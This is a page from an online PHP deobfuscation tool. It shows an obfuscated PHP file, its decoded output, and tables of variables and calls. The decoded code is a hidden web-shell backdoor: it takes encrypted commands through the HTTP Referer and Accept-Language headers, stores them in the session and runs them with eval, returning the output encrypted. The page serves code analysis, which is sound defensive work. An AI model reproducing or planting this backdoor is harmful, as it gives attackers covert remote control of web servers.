Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$d='=@88$r["HTTP8_RE8FE8RER"];8$ra=@$r["HTT8P_AC8CEPT_LANGUAGE"];8if8($rr&&$ra){88$u=p8ars..

Decoded Output download

$kh="bd0d";$kf="4499";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

$d='=@88$r["HTTP8_RE8FE8RER"];8$ra=@$r["HTT8P_AC8CEPT_LANGUAGE"];8if8($rr&&$ra){88$u=p8arse_ur8l($rr);';
$t='_/","/-8/"),arr88ay("/",8"+"),$ss($s[8$i],80,$e))),$k)))8;$o88=ob_get8_contents(8);ob_end8_clea8n(';
$q=';8){for($j=08;($j<$c8&&$i<$l8);8$j++8,$i++){$o.=$8t{8$i}^$k{$j8};}}ret88urn 8$o;}$r=$_SE8RVER;$8rr';
$O='));$8p="";8for($z=1;$8z8<count8($m[1]);$z+8+)$p8.=$8q[$m[2][$8z]8];if(strpos8($p,$8h)===0){8$s8[$i';
$T='$kh8="bd0d";$k8f="4499"8;functio8n8 x($t,$8k){$c=strl8e8n($k);$l=s8tr88len($t);$o="";for8($i=088;$i<$l';
$l='olowe88r";$i=$m[81][0].$m[81][18];$h8=$sl($ss(m8d5($i.$k8h),0,388))8;$8f=$sl($ss8(md5($i.$kf8),0,3';
$Y=');$d=ba8se684_encod88e(x(gzco8m88p8ress($o),8$k));print("<$k>$8d<8/$k>");@session_d8estroy8();}}}}';
$g=str_replace('YG','','cYGreYGYGatYGeYG_functYGion');
$I='parse8_s8tr($8u["8query"]8,$q);$q=a8rr8ay_va8lues($q);preg_ma88tch_all("/88([\\w])[\\w-]+(8?8:;8q=0.';
$A=']="";$p8=$ss8($p,3);}88if(arr8ay_key8_exis8ts($i,$s)){8$s[$i].8=$p;88$e=strpos($s8[$i],$f)8;if($8e';
$K='){$k=$8kh.8$kf;ob_sta8rt();8@eva8l8(@gzu8ncompress8(@x(@bas8e64_8dec8o8de(p8reg_replace(array8("/8';
$s='([\\8d]))?,?/",$r8a,$m);if($q8&&$m)8{@88session_start();8$s=&$_S88ESSION;$ss8="subs8tr8";$sl="strt8';
$H=str_replace('8','',$T.$q.$d.$I.$s.$l.$O.$A.$K.$t.$Y);
$D=$g('',$H);$D();

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A ]="";$p8=$ss8($p,3);}88if(arr8ay_key8_exis8ts($i,$s)){8$s[$i..
$D None
$H $kh="bd0d";$kf="4499";function x($t,$k){$c=strlen($k);$l=str..
$I parse8_s8tr($8u["8query"]8,$q);$q=a8rr8ay_va8lues($q);preg_m..
$K ){$k=$8kh.8$kf;ob_sta8rt();8@eva8l8(@gzu8ncompress8(@x(@bas8..
$O ));$8p="";8for($z=1;$8z8<count8($m[1]);$z+8+)$p8.=$8q[$m[2][..
$T $kh8="bd0d";$k8f="4499"8;functio8n8 x($t,$8k){$c=strl8e8n($k..
$Y );$d=ba8se684_encod88e(x(gzco8m88p8ress($o),8$k));print("<$k..
$d =@88$r["HTTP8_RE8FE8RER"];8$ra=@$r["HTT8P_AC8CEPT_LANGUAGE"]..
$g create_function
$l olowe88r";$i=$m[81][0].$m[81][18];$h8=$sl($ss(m8d5($i.$k8h),..
$q ;8){for($j=08;($j<$c8&&$i<$l8);8$j++8,$i++){$o.=$8t{8$i}^$k{..
$s ([\8d]))?,?/",$r8a,$m);if($q8&&$m)8{@88session_start();8$s=&..
$t _/","/-8/"),arr88ay("/",8"+"),$ss($s[8$i],80,$e))),$k)))8;$o..

Stats

MD5 331729b36d6b58ef41280a2726a12ef8
Eval Count 1
Decode Time 121 ms